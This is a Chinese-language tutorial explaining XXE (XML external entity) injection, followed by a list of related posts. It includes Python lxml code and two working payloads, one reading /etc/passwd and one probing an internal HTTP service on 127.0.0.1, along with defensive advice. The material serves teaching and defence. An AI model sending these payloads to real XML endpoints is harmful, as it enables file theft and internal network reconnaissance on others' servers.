利用 XML 外部实体注入(XXE)读取文件和探测内部网络

利用 XML 外部实体注入(XXE)读取文件和探测内部网络

引言

XML 外部实体注入(XXE)是一种常见的安全漏洞,攻击者可以通过这种漏洞读取服务器上的文件或探测内部网络。本文将通过一个实际的 Python 代码示例,展示如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

什么是 XXE?

XML 外部实体注入(XXE)是指在解析 XML 数据时,如果 XML 解析器启用了外部实体解析功能,攻击者可以注入恶意的 XML 实体来访问服务器上的敏感文件或发起网络请求。这种漏洞通常出现在使用 XML 解析库的应用程序中,特别是在未正确配置解析器的情况下。

代码示例

以下是一个 Python 代码示例,展示了如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

python 复制代码
from lxml import etree
import requests

# XML payload to read /etc/passwd
x = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall>
  <methodname>&xxe;</methodname>
</methodcall>
"""

# XML payload to probe internal network (e.g., 127.0.0.1)
x1 = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://127.0.0.1:8000" >]>
<methodcall>
  <methodname>&xxe;</methodname>
</methodcall>
"""

def parse_xml(xml_bytes):
    try:
        # Parse the XML bytes with lxml, which supports external entities
        parser = etree.XMLParser(resolve_entities=True)
        root = etree.fromstring(xml_bytes, parser=parser)
        methodname = root.find('methodname').text
        print(methodname)
    except Exception as e:
        print(f"Error: {e}")

# Parse the first XML string
parse_xml(x)

# Parse the second XML string
parse_xml(x1)

代码解析

  1. XML Payload:

    • xx1 是两个字节字符串,分别包含外部实体 &xxe;
    • x 中的外部实体指向 /etc/passwd 文件。
    • x1 中的外部实体指向 http://127.0.0.1:8000
  2. 解析函数:

    • parse_xml 函数使用 lxml.etree.fromstring 解析字节字符串,并打印 <methodname> 元素的内容。
    • etree.XMLParser(resolve_entities=True) 参数启用外部实体解析。
  3. 解析 XML 字符串:

    • 调用 parse_xml(x) 解析第一个 XML 字节字符串,读取 /etc/passwd 文件内容。
    • 调用 parse_xml(x1) 解析第二个 XML 字节字符串,探测 http://127.0.0.1:8000 的内容。

运行结果

当运行上述代码时,如果成功读取到 /etc/passwd 文件,将会输出文件内容。如果成功探测到 http://127.0.0.1:8000,将会输出该 URL 的响应内容。

如何防御 XXE 漏洞

为了防止 XXE 漏洞,可以采取以下措施:

  1. 禁用外部实体解析 :在解析 XML 时,禁用外部实体解析功能。例如,在 lxml 中,可以使用 etree.XMLParser(resolve_entities=False)
  2. 使用安全的 XML 解析库:选择那些默认不解析外部实体的库。
  3. 输入验证:对用户输入进行严格的验证,确保输入的数据符合预期格式。
  4. 定期更新和打补丁:保持系统和库的最新状态,及时应用安全补丁。

结论

通过上述示例,我们可以看到 XXE 漏洞的潜在危害。了解这些漏洞并采取适当的防御措施对于保护应用程序的安全至关重要。希望本文能够帮助读者更好地理解 XXE 漏洞及其防范方法。

相关推荐
困到晕阙37 分钟前
[NCTF2019]Fake XML cookbook
xml·xxe
北极光SD-WAN组网1 小时前
从0到1搭建某铝箔智慧工厂网络:5G与WiFi 6助力智能制造
网络·5g·制造
阿昭L1 小时前
HTTP原理
网络·网络协议·http
hazy1k2 小时前
STM32H750 RTC介绍及应用
网络·stm32·实时音视频
没书读了2 小时前
考研复习-计算机网络-第三章-数据链路层
网络·计算机网络·考研
on the way 1233 小时前
多线程之HardCodedTarget(type=OssFileClient, name=file, url=http://file)异常
网络·网络协议·http
WhoisXMLAPI3 小时前
WhoisXML API再次荣登2025年美国Inc. 5000快速成长企业榜单
网络·安全
ruleslol3 小时前
五分钟XML速成
xml
阿sir1984 小时前
ZYNQ 自定义IP
服务器·网络·tcp/ip
星马梦缘5 小时前
计算机网络4 第四章 网络层——网络间的通信问题(省际之间如何规划信件运输路线)
网络·计算机网络·路由·ip地址·子网掩码·icmp·ipv4/ipv6